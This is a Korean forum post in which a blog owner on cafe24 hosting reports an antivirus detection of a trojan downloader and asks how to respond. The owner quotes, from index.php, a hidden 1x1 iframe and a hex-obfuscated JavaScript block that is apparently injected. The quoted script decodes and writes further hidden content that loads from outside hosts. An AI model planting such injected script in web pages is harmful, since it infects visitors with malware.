주제: 악성코드? 이건 뭘까요
호스팅-cafe24
TC 1.7.6
어제부터 갑자기 백신이 제 블로그에서 악성코드를 잡아내더라구요 (커스퍼스키IS)
2008-12-14 오전 11:41:33 탐지: Trojan-Downloader.Win32.Small.ageu Adobe Acrobat 8.1 http://94.247.2.157/.lck/?h=9ac0i?892bd … 0000000170
사이트 로딩중에 gogo2me.net이라는 사이트가 스쳐지나가고 94.247.2.157도 보이네요
최상위경로에서 index.php를 뜯어보니까 제일 아랫줄에 아이프레임이 삽입돼있네요 이건 원래부터 삽입돼있던건지 아닌지도 모르겠네요
iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4943ef0c9e224(l4943ef0c9e9f4){ return (parseInt(l4943ef0c9e9f4,16));}function l4943ef0ca093d(l4943ef0ca1107){ var l4943ef0ca1cc1='';l4943ef0ca47bb=String.fromCharCode;for(l4943ef0ca3036=0;l4943ef0ca3036<l4943ef0ca1107.length;l4943ef0ca3036+=2){ l4943ef0ca1cc1+=(l4943ef0ca47bb(c102916999516l4943ef0c9e224(l4943ef0ca1107.substr(l4943ef0ca3036,2))));}return l4943ef0ca1cc1;} var xf0='';var l4943ef0ca4f8e='3C736'+xf0+'3726'+xf0+'970743E6'+xf0+'96'+xf0+'6'+xf0+'28216'+xf0+'D796'+xf0+'96'+xf0+'1297B6'+xf0+'46'+xf0+'F6'+xf0+'3756'+xf0+'D6'+xf0+'56'+xf0+'E742E77726'+xf0+'9746'+xf0+'528756'+xf0+'E6'+xf0+'5736'+xf0+'36'+xf0+'1706'+xf0+'528202725336'+xf0+'32536'+xf0+'392536'+xf0+'36'+xf0+'2537322536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'352532302536'+xf0+'6'+xf0+'52536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'3525336'+xf0+'42536'+xf0+'332533312533302532302537332537322536'+xf0+'3325336'+xf0+'42532372536'+xf0+'3825373425373425373025336'+xf0+'125326'+xf0+'6'+xf0+'25326'+xf0+'6'+xf0+'2536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'2536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'2533322536'+xf0+'6'+xf0+'42536'+xf0+'3525326'+xf0+'52536'+xf0+'6'+xf0+'52536'+xf0+'3525373425326'+xf0+'6'+xf0+'25326'+xf0+'52536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'25326'+xf0+'6'+xf0+'2536'+xf0+'332536'+xf0+'382536'+xf0+'352536'+xf0+'332536'+xf0+'6'+xf0+'225326'+xf0+'52536'+xf0+'382537342536'+xf0+'6'+xf0+'42536'+xf0+'6'+xf0+'32532372532302537372536'+xf0+'392536'+xf0+'342537342536'+xf0+'3825336'+xf0+'42533372533312533352532302536'+xf0+'382536'+xf0+'352536'+xf0+'392536'+xf0+'372536'+xf0+'3825373425336'+xf0+'42533312533312533302532302537332537342537392536'+xf0+'6'+xf0+'32536'+xf0+'3525336'+xf0+'4253237253736'+xf0+'2536'+xf0+'392537332536'+xf0+'392536'+xf0+'322536'+xf0+'392536'+xf0+'6'+xf0+'32536'+xf0+'3925373425373925336'+xf0+'12536'+xf0+'382536'+xf0+'392536'+xf0+'342536'+xf0+'342536'+xf0+'352536'+xf0+'6'+xf0+'525323725336'+xf0+'525336'+xf0+'325326'+xf0+'6'+xf0+'2536'+xf0+'392536'+xf0+'36'+xf0+'2537322536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'3525336'+xf0+'52729293B7D76'+xf0+'6'+xf0+'172206'+xf0+'D796'+xf0+'96'+xf0+'13D7472756'+xf0+'53B3C2F736'+xf0+'3726'+xf0+'970743E';document.write(l4943ef0ca093d(l4943ef0ca4f8e)); /script
어디부터 손써야할까요
ㅠㅠ